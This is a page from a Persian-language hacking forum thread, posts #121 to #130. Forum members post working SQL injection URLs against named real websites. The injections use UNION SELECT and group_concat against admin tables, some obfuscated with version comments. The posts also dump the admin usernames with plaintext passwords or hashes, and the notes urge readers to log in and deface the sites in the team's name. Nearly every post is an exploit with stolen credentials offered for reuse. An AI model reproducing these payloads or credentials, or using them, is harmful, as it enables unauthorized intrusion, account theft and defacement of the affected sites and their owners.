پرش به


تصویر

دیتابیس سایت های مورد نفوذ قرار گرفته (خارجی)

اختصاصی

 • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
217 پاسخ برای این موضوع

#121 ارسالی 22 ژوئیه 2016 - 07:29

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://www.micro-mechanics.com/
http://www.micro-mechanics.com/about.php?id=-3%20/*!50000uNIon*/+select%201,2,0x496e6a656374656420427920426c34636b205734726e696e67202d204952414e4f4e594d4f5553,4,/*!50000gRoUp_ConCat%28username,0x3a,password%29*/,6,7,8,9,10,11+from+admin--
admin:password

این سایت های دیفیس نشدن فقط دیتابیس قرار داده میشه

صفحه لوگین پیدا کنید و دیفیس کنید


ویرایش شده توسط Bl4ck.W4rning 22 ژوئیه 2016 - 07:33 .

تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


#122 ارسالی 23 ژوئیه 2016 - 10:58

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 21 ساعت قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown

Target :

 

http://www.exoticfever.com

Inject page :

 

http://www.exoticfev...ists.php?id=115


Username : Admin

Password : $P$BpfW5TDYuAH0kVXMdSd7maR2yCtkoY/


image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


#123 ارسالی 24 ژوئیه 2016 - 05:34

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black

Target

http://www.putridflowers.com

Injected

 

http://www.putridflowers.com/music.php?id=-2%20union%20select%201,2,0x496e6a656374656420427920426c34636b205734726e696e67202d204972616e6f6e796d6f75732e6f7267,4,5,6,7,8,group_concat%28loginid,0x3a,password%29,10,11,12,13,14,15,16,17+from+pf_admin--

نکته: دیتابیس در اختیار شما قرار میگیره دیفیس با شما :)


تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


#124 ارسالی 25 ژوئیه 2016 - 01:39

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://www.autostyle.co.uk/catalog/category.php?catid=67

http://www.autostyle.co.uk/catalog/category.php?catid=-67%20union%20select%201,2,3,group_concat%28user_name,0x3a,user_password%29,0x496e6a656354656420427920426c34636b205734726e696e67202d204972616e6f6e796d6f75732e6f7267+from+administrators--

 

maddy:$P$BW7pLm2rlR/RuEtWGeTNnCKawf.m7.

,peter:$P$DACZFhmOpDquU797ag017km/EOKVuN.

نکته:دیفیس نشده - دیفیس کنید و به اسم تیم ثبت کنید :)


تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


#125 ارسالی 26 ژوئیه 2016 - 02:00

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://tabletworld.co.in
http://tabletworld.co.in/order.php?pid=-8%20/*!50000union*/+select%201,2,3,4,/*!50000gRouP_ConcAT%28username,0x3a,password,0x3a,0x496e6a656374656420427920426c34636b205734726e696e67202d204972616e6f6e796d6f75732e6f7267%29*/,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin--
admin:admin

نکته:دیتابیس در اختیار شما قرار گرفته - دیفیس کنید :)


تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


#126 ارسالی 29 ژوئیه 2016 - 07:39

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://www.uomlasparejas.com.ar
http://www.uomlasparejas.com.ar/nota_completa.php?id=-15%27+union+select+1,2,3,0x496e6a656374656420427920426c34636b205734726e696e67202d204972616e6f6e796d6f75732e6f7267,group_concat%28usuario,0x3a,password%29,6,7,8,9+from+usuarios--+

نکته:دیفیس نشده دیفیس با شما :)

یکم نیستم عذر میخوام


ویرایش شده توسط Bl4ck W4rning 29 ژوئیه 2016 - 07:41 .

تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


#127 ارسالی 01 اوت 2016 - 01:32

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 21 ساعت قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown

Target :

 http://www.nhuathanhcong.com 

Inject Page :

 http://www.nhuathanh...t_detail&id=720 


Username :  adminpt 
Password   :   b36785e39beb0e8decf090142fd8df8c


 


image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


#128 ارسالی 01 اوت 2016 - 07:19

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://www.uomlasparejas.com.ar
http://www.uomlasparejas.com.ar/nota_completa.php?id=-15%27+union+select+1,2,3,0x496e6a656354656420427920426c34636b205734726e696e67202d204972616e6f6e796d6f75732e6f7267,group_concat%28usuario,0x3a,password%29,6,7,8,9+from+usuarios--+

نکته:دیفیس با شما


تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


#129 ارسالی 03 اوت 2016 - 10:51

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://www.capitalideasonline.com


http://www.capitalideasonline.com/articles/index.php?id=-1792%27+union+select+1,2,3,4,0x496e6a656354656420427920426c34636b205734726e696e67202d204972616e6f6e796d6f75732e6f7267,6,7,8,9,10,11,group_concat%28username,0x3a,password%29,13,14,15,16+from+admin--+
admin:0

تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


#130 ارسالی 05 اوت 2016 - 10:54

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 127 ارسال
  Last Visit اكتبر 08 2017 09:55
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://www.encuentromini.com.ar
http://www.encuentromini.com.ar/nota.php?id=28%27+union%20select+1,0x496e6a656354656420427920426c34636b205734726e696e67202d20204972616e6f6e796d6f75732e6f7267,group_concat%28usuario,0x3a,pass%29,4,5,6,7+from+usuarios--+
minibasquet:super135bask

تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


1 کاربر در حال خواندن این موضوع است

0 کاربر، 1 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP